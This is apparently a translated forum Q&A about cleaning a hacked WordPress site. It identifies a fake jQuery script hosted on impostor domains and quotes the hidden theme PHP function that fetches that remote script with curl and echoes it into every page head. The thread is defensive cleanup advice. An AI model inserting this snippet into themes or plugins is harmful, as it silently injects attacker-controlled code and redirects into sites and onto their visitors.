3

我的网站被黑了,我一辈子都找不到它被注入的地方。我已采取必要的预防措施以确保它不会再次发生,并且我正在将我的网站从备份恢复到更早的时间,但我想知道在哪里可以找到它,以防它发生在我托管的另一个网站上。

这是恶意脚本:http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js

这是网站:(现已删除)

我到处检查过,但都没有成功。

任何帮助将不胜感激。

谢谢你。

**对于那些投票给我的人,我已经做了很多研究,试图在过去的 4 个小时里自己解决这个问题,我的腿上有一个 11 个月大的孩子。我只是在万不得已的情况下才发布这个问题,因为我自己没有成功地做到这一点。由于过去我从这里的人那里得到了很大的帮助,所以我认为问一下也无妨。

4

1 回答 1

8

写下所有评论作为答案,因为这里有很好的信息来对抗漏洞利用。


问题

在 Wordpress 驱动的站点的源代码中发现了一个带有冒充 jQuery CDN 的 URL 的脚本。听起来 jquerys.com 和 jqueryc.com 都被用作冒名顶替的域。

恶意代码很简单;它随机重定向到另一个站点并设置一个 cookie 以防止立即重定向(每天一次)。由于它不常见,因此在开发站点时可能永远不会看到它,或者忽略它。

可能的原因

  • 输入网址错误
  • 受损的服务器
  • 恶意主题
  • 一个恶意插件

解析度

开始:http ://codex.wordpress.org/FAQ_My_site_was_hacked

OP 在主题中找到了这段代码:

// !!! Suspect Code - Do not use for any purpose !!!

//Jquery Function 
if (!function_exists('insert_jquery_theme')){
    function insert_jquery_theme(){
        if (function_exists('curl_init')){
        $url="jqueryc.com/jquery-1.6.3.min.js";
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo $data;
     }
  }

  add_action('wp_head', 'insert_jquery_theme');
}

查看源码,其实有两个对jQuery的引用;一种合法,一种不合法。删除上述代码片段可以解决问题。

确定恶意代码的来源(例如主题、插件或受感染的服务器)仍然很重要。如果不检查它们是否存在恶意代码,则不应恢复备份。

相关链接

于 2012-08-02T22:10:41.157 回答